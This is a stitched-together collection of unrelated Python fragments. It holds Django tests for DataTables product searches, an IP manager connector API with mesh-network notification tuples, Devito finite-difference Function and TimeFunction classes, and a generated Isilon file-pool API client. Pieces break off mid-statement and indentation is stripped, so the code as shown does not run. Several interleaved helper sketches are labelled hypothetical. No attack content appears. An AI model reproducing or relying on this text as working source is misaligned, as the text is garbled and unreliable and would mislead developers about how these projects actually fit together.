models.Product.objects.create(product_id="id %s" % e, vendor=v1)
models.Product.objects.create(product_id=test_pid_search_term, vendor=v1)
url = reverse('productdb:datatables_vendor_products_endpoint', kwargs={"vendor_id": v1.id})
up = UserProfile.objects.get(user=User.objects.get(username=AUTH_USER["username"]))
assert up.regex_search is False, "Use simple search by default"
client = Client()
client.login(**AUTH_USER)
# call without search term
response = client.get(url)
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 50
# call with common search term
response = client.get(url + "?" + quote("search[value]") + "=" + quote(test_pid_search_term))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with case-insensitive common search term
response = client.get(url + "?" + quote("search[value]") + "=" + quote(test_pid_search_term.lower()))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with column search term
response = client.get(url + "?" + quote("columns[0][search][value]") + "=" + quote(test_pid_search_term))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with case-insensitive column search term
response = client.get(url + "?" + quote("columns[0][search][value]") + "=" + quote(test_pid_search_term.lower()))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
@pytest.mark.usefixtures("import_default_users")
@pytest.mark.usefixtures("import_default_vendors")
def test_datatables_search_on_vendor_products_view():
test_pid_search_term = "Test Product ID"
uv = Vendor.objects.get(id=0)
for e in range(1, 50):
models.Product.objects.create(product_id="id %s" % e, vendor=uv)
models.Product.objects.create(product_id=test_pid_search_term, vendor=uv)
# if the vendor is not specified, the unassigned vendor is used
url = reverse('productdb:datatables_vendor_products_view')
up = UserProfile.objects.get(user=User.objects.get(username=AUTH_USER["username"]))
assert up.regex_search is False, "Use simple search by default"
client = Client()
client.login(**AUTH_USER)
# call without search term
response = client.get(url)
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 50
# call with common search term
response = client.get(url + "?" + quote("search[value]") + "=" + quote(test_pid_search_term))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with case-insensitive common search term
response = client.get(url + "?" + quote("search[value]") + "=" + quote(test_pid_search_term.lower()))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with column search term
response = client.get(url + "?" + quote("columns[0][search][value]") + "=" + quote(test_pid_search_term))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with case-insensitive column search term
response = client.get(url + "?" + quote("columns[0][search][value]") + "=" + quote(test_pid_search_term.lower()))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
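# The datatables tests in this module build their query strings by hand from the
# DataTables server-side parameters: "search[value]" carries the global search term
# and "columns[N][search][value]" carries a per-column search term. A small helper
# like the hypothetical sketch below could centralise that construction; the helper
# name is illustrative and is not part of the original test suite, and it reuses the
# module's existing `quote` import.
def _datatables_search_url(base_url, term, column=None):
    """Return base_url with a DataTables global or per-column search parameter appended."""
    param = "search[value]" if column is None else "columns[%d][search][value]" % column
    return base_url + "?" + quote(param) + "=" + quote(term)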
@pytest.mark.usefixtures("import_default_users")
@pytest.mark.usefixtures("import_default_vendors")
def test_datatables_search_on_list_products_view():
test_pid_search_term = "Test Product ID"
uv = Vendor.objects.get(id=0)
for e in range(1, 50):
models.Product.objects.create(product_id="id %s" % e, vendor=uv)
models.Product.objects.create(product_id=test_pid_search_term, vendor=uv)
url = reverse('productdb:datatables_list_products_view')
up = UserProfile.objects.get(user=User.objects.get(username=AUTH_USER["username"]))
assert up.regex_search is False, "Use simple search by default"
client = Client()
client.login(**AUTH_USER)
# call without search term
response = client.get(url)
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 50
# call with common search term
response = client.get(url + "?" + quote("search[value]") + "=" + quote(test_pid_search_term))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with case-insensitive common search term
response = client.get(url + "?" + quote("search[value]") + "=" + quote(test_pid_search_term.lower()))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with column search term
response = client.get(url + "?" + quote("columns[1][search][value]") + "=" + quote(test_pid_search_term))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with case-insensitive column search term
response = client.get(url + "?" + quote("columns[1][search][value]") + "=" + quote(test_pid_search_term.lower()))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
@pytest.mark.usefixtures("import_default_users")
@pytest.mark.usefixtures("import_default_vendors")
def test_datatables_search_on_list_product_groups_view():
test_pg_search_term = "Test Product Group"
uv = Vendor.objects.get(id=0)
for e in range(1, 50):
models.ProductGroup.objects.create(vendor=uv, name="Product Group %d" % e)
models.ProductGroup.objects.create(name=test_pg_search_term, vendor=uv)
url = reverse('productdb:datatables_list_product_groups')
up = UserProfile.objects.get(user=User.objects.get(username=AUTH_USER["username"]))
assert up.regex_search is False, "Use simple search by default"
client = Client()
client.login(**AUTH_USER)
# call without search term
response = client.get(url)
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 50
# call with common search term
response = client.get(url + "?" + quote("search[value]") + "=" + quote(test_pg_search_term))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with case-insensitive common search term
response = client.get(url + "?" + quote("search[value]") + "=" + quote(test_pg_search_term.lower()))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with column search term
response = client.get(url + "?" + quote("columns[1][search][value]") + "=" + quote(test_pg_search_term))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with case-insensitive column search term
response = client.get(url + "?" + quote("columns[1][search][value]") + "=" + quote(test_pg_search_term.lower()))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
@pytest.mark.usefixtures("import_default_users")
@pytest.mark.usefixtures("import_default_vendors")
def test_datatables_search_on_list_products_by_product_group_view():
test_pid_search_term = "Test Product ID"
uv = Vendor.objects.get(id=0)
pg = models.ProductGroup.objects.create(name="PG1")
for e in range(1, 50):
models.Product.objects.create(product_id="id %s" % e, vendor=uv, product_group=pg)
models.Product.objects.create(product_id=test_pid_search_term, vendor=uv, product_group=pg)
url = reverse('productdb:datatables_list_products_by_group_view', kwargs={"product_group_id": pg.id})
up = UserProfile.objects.get(user=User.objects.get(username=AUTH_USER["username"]))
assert up.regex_search is False, "Use simple search by default"
client = Client()
client.login(**AUTH_USER)
# call without search term
response = client.get(url)
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 50
# call with common search term
response = client.get(url + "?" + quote("search[value]") + "=" + quote(test_pid_search_term))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with case-insensitive common search term
response = client.get(url + "?" + quote("search[value]") + "=" + quote(test_pid_search_term.lower()))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# call with column search term
response = client.get(url + "?" + quote("columns[0][search][value]") + "=" + quote(test_pid_search_term))
assert response.status_code == status.HTTP_200_OK
result_json = response.json()
assert "data" in result_json
assert "draw" in result_json
assert "recordsTotal" in result_json
assert "recordsFiltered" in result_json
assert result_json["recordsFiltered"] == 1
# There is no restriction on the value of this field.
#
Tuple_dn_getMoteLinks = collections.namedtuple("Tuple_dn_getMoteLinks", ['RC', 'idx', 'utilization', 'numLinks', 'frameId_1', 'slot_1', 'channelOffset_1', 'moteId_1', 'flags_1', 'frameId_2', 'slot_2', 'channelOffset_2', 'moteId_2', 'flags_2', 'frameId_3', 'slot_3', 'channelOffset_3', 'moteId_3', 'flags_3', 'frameId_4', 'slot_4', 'channelOffset_4', 'moteId_4', 'flags_4', 'frameId_5', 'slot_5', 'channelOffset_5', 'moteId_5', 'flags_5', 'frameId_6', 'slot_6', 'channelOffset_6', 'moteId_6', 'flags_6', 'frameId_7', 'slot_7', 'channelOffset_7', 'moteId_7', 'flags_7', 'frameId_8', 'slot_8', 'channelOffset_8', 'moteId_8', 'flags_8', 'frameId_9', 'slot_9', 'channelOffset_9', 'moteId_9', 'flags_9', 'frameId_10', 'slot_10', 'channelOffset_10', 'moteId_10', 'flags_10'])
##
# The getMoteLinks command returns information about links assigned to the mote. The response contains a list of links starting with the Nth link on the mote, where N is supplied as the idx parameter in the request. To retrieve all links on the device, the user can call this command with an idx that increments by the number of links returned in the prior response, until the command returns the RC_END_OF_LIST response code. Note that links assigned to a mote may change between API calls.
#
# \param macAddress 8-byte field formatted as a hex.<br/>
# There is no restriction on the value of this field.
# \param idx 2-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
#
# \returns The response to the command, formatted as a #Tuple_dn_getMoteLinks named tuple.
#
def dn_getMoteLinks(self, macAddress, idx) :
res = IpMgrConnectorMuxInternal.send(self, ['getMoteLinks'], {"macAddress" : macAddress, "idx" : idx})
return IpMgrConnectorMux.Tuple_dn_getMoteLinks(**res)
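# A minimal usage sketch for the pagination pattern described above: keep calling
# getMoteLinks with a growing idx until the manager reports RC_END_OF_LIST. The
# connector instance, the MAC address and the rc_end_of_list value are assumptions
# for illustration only; depending on how the connector is configured, a non-zero
# RC may surface as an exception instead of a returned code.
def _collect_all_mote_links(connector, macAddress, rc_end_of_list):
    links = []
    idx = 0
    while True:
        res = connector.dn_getMoteLinks(macAddress, idx)
        if res.RC == rc_end_of_list:
            break
        links.append(res)
        idx += res.numLinks  # advance by the number of links in this response
    return links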
#======================== notifications ===================================
##
# Dictionary of all notification tuples.
#
notifTupleTable = {}
##
# \brief MANAGER_HELLO notification.
#
# Sent by the manager to initiate a new session with a client.
#
# Formatted as a Tuple_manager_hello named tuple. It contains the following fields:
# - <tt>version</tt> 1-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>mode</tt> 1-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
#
MANAGER_HELLO = "manager_hello"
notifTupleTable[MANAGER_HELLO] = Tuple_manager_hello = collections.namedtuple("Tuple_manager_hello", ['version', 'mode'])
##
# \brief EVENTMOTERESET notification.
#
# This notification is sent when a user-initiated reset is executed by the manager.
#
# Formatted as a Tuple_eventMoteReset named tuple. It contains the following fields:
# - <tt>eventId</tt> 4-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>macAddress</tt> 8-byte field formatted as a hex.<br/>
# There is no restriction on the value of this field.
#
EVENTMOTERESET = "eventMoteReset"
notifTupleTable[EVENTMOTERESET] = Tuple_eventMoteReset = collections.namedtuple("Tuple_eventMoteReset", ['eventId', 'macAddress'])
##
# \brief EVENTNETWORKRESET notification.
#
# This notification is sent when the manager starts the network. This event has no eventData fields.
#
# Formatted as a Tuple_eventNetworkReset named tuple. It contains the following fields:
# - <tt>eventId</tt> 4-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
#
EVENTNETWORKRESET = "eventNetworkReset"
notifTupleTable[EVENTNETWORKRESET] = Tuple_eventNetworkReset = collections.namedtuple("Tuple_eventNetworkReset", ['eventId'])
##
# \brief EVENTCOMMANDFINISHED notification.
#
# The commandFinished notification is sent when a command associated with the provided callback id finishes executing.
#
# Formatted as a Tuple_eventCommandFinished named tuple. It contains the following fields:
# - <tt>eventId</tt> 4-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>callbackId</tt> 4-byte field formatted as a hex.<br/>
# There is no restriction on the value of this field.
# - <tt>rc</tt> 1-byte field formatted as a int.<br/>
# This field can only take one of the following values:
# - 0: OK
# - 1: nack
# - 2: commandTimeout
#
EVENTCOMMANDFINISHED = "eventCommandFinished"
notifTupleTable[EVENTCOMMANDFINISHED] = Tuple_eventCommandFinished = collections.namedtuple("Tuple_eventCommandFinished", ['eventId', 'callbackId', 'rc'])
##
# \brief EVENTMOTEJOIN notification.
#
# This notification is sent when a mote joins the network.
#
# Formatted as a Tuple_eventMoteJoin named tuple. It contains the following fields:
# - <tt>eventId</tt> 4-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>macAddress</tt> 8-byte field formatted as a hex.<br/>
# There is no restriction on the value of this field.
#
EVENTMOTEJOIN = "eventMoteJoin"
notifTupleTable[EVENTMOTEJOIN] = Tuple_eventMoteJoin = collections.namedtuple("Tuple_eventMoteJoin", ['eventId', 'macAddress'])
##
# \brief EVENTMOTEOPERATIONAL notification.
#
# This notification is sent when a mote that joins the network becomes operational.
#
# Formatted as a Tuple_eventMoteOperational named tuple. It contains the following fields:
# - <tt>eventId</tt> 4-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>macAddress</tt> 8-byte field formatted as a hex.<br/>
# There is no restriction on the value of this field.
#
EVENTMOTEOPERATIONAL = "eventMoteOperational"
notifTupleTable[EVENTMOTEOPERATIONAL] = Tuple_eventMoteOperational = collections.namedtuple("Tuple_eventMoteOperational", ['eventId', 'macAddress'])
##
# \brief EVENTMOTELOST notification.
#
# This notification is sent when a mote's state changes to Lost, which indicates that the mote is not responding to downstream messages.
#
# Formatted as a Tuple_eventMoteLost named tuple. It contains the following fields:
# - <tt>eventId</tt> 4-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>macAddress</tt> 8-byte field formatted as a hex.<br/>
# There is no restriction on the value of this field.
#
EVENTMOTELOST = "eventMoteLost"
notifTupleTable[EVENTMOTELOST] = Tuple_eventMoteLost = collections.namedtuple("Tuple_eventMoteLost", ['eventId', 'macAddress'])
##
# \brief EVENTNETWORKTIME notification.
#
# The time notification is triggered by the client asserting the TIME pin or by calling the getTime command. This notification contains the time when the TIME pin was asserted (or the getTime command was processed), expressed as:
#
# - ASN: the absolute slot number (the number of timeslots since 7/2/2002 8:00:00 PM PST if UTC is set on the manager, otherwise since Jan 1, 1970)
# - Uptime: the number of seconds since the device was booted
# - Unixtime: the number of seconds and microseconds since Jan 1, 1970, in UTC
#
# Formatted as a Tuple_eventNetworkTime named tuple. It contains the following fields:
# - <tt>eventId</tt> 4-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>uptime</tt> 4-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>utcSecs</tt> 8-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>utcUsecs</tt> 4-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>asn</tt> 5-byte field formatted as a hex.<br/>
# There is no restriction on the value of this field.
# - <tt>asnOffset</tt> 2-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
#
EVENTNETWORKTIME = "eventNetworkTime"
notifTupleTable[EVENTNETWORKTIME] = Tuple_eventNetworkTime = collections.namedtuple("Tuple_eventNetworkTime", ['eventId', 'uptime', 'utcSecs', 'utcUsecs', 'asn', 'asnOffset'])
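# The utcSecs/utcUsecs pair in the tuple above is an ordinary Unix timestamp split
# into seconds and microseconds, so it can be converted to a Python datetime as in
# this hypothetical helper (the notification object is assumed to be a
# Tuple_eventNetworkTime instance received from the notification stream):
def _network_time_to_datetime(notif):
    import datetime
    return (datetime.datetime.utcfromtimestamp(notif.utcSecs)
            + datetime.timedelta(microseconds=notif.utcUsecs))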
##
# \brief EVENTPINGRESPONSE notification.
#
# This notification is sent when a reply is received from a mote ping.
#
# Formatted as a Tuple_eventPingResponse named tuple. It contains the following fields:
# - <tt>eventId</tt> 4-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>callbackId</tt> 4-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>macAddress</tt> 8-byte field formatted as a hex.<br/>
# There is no restriction on the value of this field.
# - <tt>delay</tt> 4-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>voltage</tt> 2-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
# - <tt>temperature</tt> 1-byte field formatted as a int.<br/>
# There is no restriction on the value of this field.
for `%s`" % self.name)
key = args[self.name]
if len(key.shape) != self.ndim:
raise InvalidArgument("Shape %s of runtime value `%s` does not match "
"dimensions %s" % (key.shape, self.name, self.indices))
if key.dtype != self.dtype:
warning("Data type %s of runtime value `%s` does not match the "
"Function data type %s" % (key.dtype, self.name, self.dtype))
for i, s in zip(self.indices, key.shape):
i._arg_check(args, s, intervals[i])
# Pickling support
_pickle_kwargs = AbstractCachedFunction._pickle_kwargs +\
['grid', 'staggered', 'initializer']
class Function(TensorFunction, Differentiable):
"""A :class:`TensorFunction` providing operations to express
finite-difference approximation. A ``Function`` encapsulates
space-varying data; for time-varying data, use :class:`TimeFunction`.
:param name: Name of the symbol
:param grid: :class:`Grid` object from which to infer the data shape
and :class:`Dimension` indices.
:param space_order: Discretisation order for space derivatives. By default,
``space_order`` points are available on both sides of
a generic point of interest, including those on the grid
border. Sometimes, fewer points may be necessary; in
other cases, depending on the PDE being approximated,
more points may be necessary. In such cases, one
can pass a 3-tuple ``(o, lp, rp)`` instead of a single
integer representing the discretization order. Here,
``o`` is the discretization order, while ``lp`` and ``rp``
indicate how many points are expected on left (``lp``)
and right (``rp``) of a point of interest.
:param shape: (Optional) shape of the domain region in grid points.
:param dimensions: (Optional) symbolic dimensions that define the
data layout and function indices of this symbol.
:param dtype: (Optional) data type of the buffered data.
:param staggered: (Optional) a :class:`Dimension`, or a tuple of :class:`Dimension`s,
or a :class:`Stagger`, defining how the function is staggered.
For example:
* ``staggered=x`` entails discretization on x edges,
* ``staggered=y`` entails discretization on y edges,
* ``staggered=(x, y)`` entails discretization on xy facets,
* ``staggered=NODE`` entails discretization on node,
* ``staggered=CELL`` entails discretization on cell.
:param padding: (Optional) allocate extra grid points at a space dimension
boundary. These may be used for data alignment. Defaults to 0.
In alternative to an integer, a tuple, indicating the padding
in each dimension, may be passed; in this case, an error is
raised if such a tuple has fewer entries than the number of space
dimensions.
:param initializer: (Optional) a callable or an object exposing buffer interface
used to initialize the data. If a callable is provided,
initialization is deferred until the first access to
``data``.
:param allocator: (Optional) an object of type :class:`MemoryAllocator` to
specify where to allocate the function data when running
on a NUMA architecture. Refer to ``default_allocator()``'s
__doc__ for more information about possible allocators.
.. note::
The parameters must always be given as keyword arguments, since
SymPy uses ``*args`` to (re-)create the dimension arguments of the
symbolic function.
.. note::
If the parameter ``grid`` is provided, the values for ``shape``,
``dimensions`` and ``dtype`` will be derived from it.
.. note::
:class:`Function` objects are assumed to be constant in time
and therefore do not support time derivatives. Use
:class:`TimeFunction` for time-varying grid data.
"""
is_Function = True
def __init__(self, *args, **kwargs):
if not self._cached():
super(Function, self).__init__(*args, **kwargs)
# Space order
space_order = kwargs.get('space_order', 1)
if isinstance(space_order, int):
self._space_order = space_order
elif isinstance(space_order, tuple) and len(space_order) == 3:
self._space_order, _, _ = space_order
else:
raise TypeError("`space_order` must be int or 3-tuple of ints")
# Dynamically add derivative short-cuts
self._fd = generate_fd_shortcuts(self)
@classmethod
def __indices_setup__(cls, **kwargs):
grid = kwargs.get('grid')
dimensions = kwargs.get('dimensions')
if grid is None:
if dimensions is None:
raise TypeError("Need either `grid` or `dimensions`")
elif dimensions is None:
dimensions = grid.dimensions
return dimensions
@classmethod
def __shape_setup__(cls, **kwargs):
grid = kwargs.get('grid')
dimensions = kwargs.get('dimensions')
shape = kwargs.get('shape', kwargs.get('shape_global'))
if grid is None:
if shape is None:
raise TypeError("Need either `grid` or `shape`")
elif shape is None:
if dimensions is not None and dimensions != grid.dimensions:
raise TypeError("Need `shape` as not all `dimensions` are in `grid`")
shape = grid.shape_local
elif dimensions is None:
raise TypeError("`dimensions` required if both `grid` and "
"`shape` are provided")
else:
# Got `grid`, `dimensions`, and `shape`. We sanity-check that the
# Dimensions in `dimensions` also appearing in `grid` have same size
# (given by `shape`) as that provided in `grid`
if len(shape) != len(dimensions):
raise ValueError("`shape` and `dimensions` must have the "
"same number of entries")
loc_shape = []
for d, s in zip(dimensions, shape):
if d in grid.dimensions:
size = grid.dimension_map[d]
if size.glb != s and s is not None:
raise ValueError("Dimension `%s` is given size `%d`, "
"while `grid` says `%s` has size `%d` "
% (d, s, d, size.glb))
else:
loc_shape.append(size.loc)
else:
loc_shape.append(s)
shape = tuple(loc_shape)
return shape
def __halo_setup__(self, **kwargs):
halo = kwargs.get('halo')
if halo is not None:
return halo
else:
space_order = kwargs.get('space_order', 1)
if isinstance(space_order, int):
halo = (space_order, space_order)
elif isinstance(space_order, tuple) and len(space_order) == 3:
_, left_points, right_points = space_order
halo = (left_points, right_points)
else:
raise TypeError("`space_order` must be int or 3-tuple of ints")
return tuple(halo if i.is_Space else (0, 0) for i in self.indices)
def __padding_setup__(self, **kwargs):
padding = kwargs.get('padding', 0)
if isinstance(padding, int):
return tuple((padding,)*2 for i in range(self.ndim))
elif isinstance(padding, tuple) and len(padding) == self.ndim:
return tuple((i,)*2 if isinstance(i, int) else i for i in padding)
else:
raise TypeError("`padding` must be int or %d-tuple of ints" % self.ndim)
@property
def space_order(self):
return self._space_order
def sum(self, p=None, dims=None):
"""
Generate a symbolic expression computing the sum of ``p`` points
along the spatial dimensions ``dims``.
:param p: (Optional) the number of summands. Defaults to the
halo extent.
:param dims: (Optional) the :class:`Dimension`s along which the
sum is computed. Defaults to ``self``'s spatial
dimensions.
"""
points = []
for d in (as_tuple(dims) or self.space_dimensions):
if p is None:
lp = self._extent_inhalo[d].left
rp = self._extent_inhalo[d].right
else:
lp = p // 2 + p % 2
rp = p // 2
indices = [d - i for i in range(lp, 0, -1)]
indices.extend([d + i for i in range(rp)])
points.extend([self.subs(d, i) for i in indices])
return sum(points)
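# Worked example of the indexing above: with p=3 along a single dimension x,
# lp = 2 and rp = 1, so the generated expression is
#
#     f.sum(p=3, dims=(x,))  ->  f(x - 2) + f(x - 1) + f(x)
#
# i.e. lp points strictly to the left of x plus rp points starting at x itself.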
def avg(self, p=None, dims=None):
"""
Generate a symbolic expression computing the average of ``p`` points
along the spatial dimensions ``dims``.
:param p: (Optional) the number of summands. Defaults to the
halo extent.
:param dims: (Optional) the :class:`Dimension`s along which the
sum is computed. Defaults to ``self``'s spatial
dimensions.
"""
tot = self.sum(p, dims)
return tot / len(tot.args)
# Pickling support
_pickle_kwargs = TensorFunction._pickle_kwargs +\
['space_order', 'shape_global', 'dimensions']
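# A brief usage sketch for the space_order variants documented in the Function
# docstring above, assuming the public devito namespace (Grid and Function are
# importable from the package top level); names and shapes are illustrative only.
def _example_function_usage():
    from devito import Grid, Function
    grid = Grid(shape=(10, 10))
    f = Function(name='f', grid=grid, space_order=2)           # symmetric halo of 2 points
    g = Function(name='g', grid=grid, space_order=(2, 1, 3))   # order 2, halo of 1 left / 3 right
    return f, g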
class TimeFunction(Function):
"""
A special :class:`Function` encapsulating time-varying data.
:param name: Name of the resulting :class:`sympy.Function` symbol
:param grid: :class:`Grid` object from which to infer the data shape
and :class:`Dimension` indices.
:param space_order: Discretisation order for space derivatives. By default,
``space_order`` points are available on both sides of
a generic point of interest, including those on the grid
border. Sometimes, fewer points may be necessary; in
other cases, depending on the PDE being approximated,
more points may be necessary. In such cases, one
can pass a 3-tuple ``(o, lp, rp)`` instead of a single
integer representing the discretization order. Here,
``o`` is the discretization order, while ``lp`` and ``rp``
indicate how many points are expected on left (``lp``)
and right (``rp``) of a point of interest.
:param time_order: Discretization order for time derivatives.
:param shape: (Optional) shape of the domain region in grid points.
:param dimensions: (Optional) symbolic dimensions that define the
data layout and function indices of this symbol.
:param dtype: (Optional) data type of the buffered data.
:param save: (Optional) defaults to `None`, which indicates the use of
alternating buffers. This enables cyclic writes to the
TimeFunction. For example, if the TimeFunction ``u(t, x)`` has
shape (3, 100), then, in an :class:`Operator`, ``t`` will
assume the values ``1, 2, 0, 1, 2, 0, 1, ...`` (note that the
very first value depends on the stencil equation in which
``u`` is written.). The default size of the time buffer when
``save=None`` is ``time_order + 1``. To | |
# Repository: Atomicology/isilon_sdk_python
# coding: utf-8
"""
FilepoolApi.py
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class FilepoolApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def create_filepool_policy(self, filepool_policy, **kwargs):
"""
Create a new policy.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_filepool_policy(filepool_policy, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param FilepoolPolicyCreateParams filepool_policy: (required)
:return: CreateFilepoolPolicyResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filepool_policy']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_filepool_policy" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'filepool_policy' is set
if ('filepool_policy' not in params) or (params['filepool_policy'] is None):
raise ValueError("Missing the required parameter `filepool_policy` when calling `create_filepool_policy`")
resource_path = '/platform/1/filepool/policies'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'filepool_policy' in params:
body_params = params['filepool_policy']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['basic_auth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateFilepoolPolicyResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def delete_filepool_policy(self, filepool_policy_id, **kwargs):
"""
Delete file pool policy.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_filepool_policy(filepool_policy_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filepool_policy_id: Delete file pool policy. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filepool_policy_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_filepool_policy" % key
)
params[key] = val
del params['kwargs']
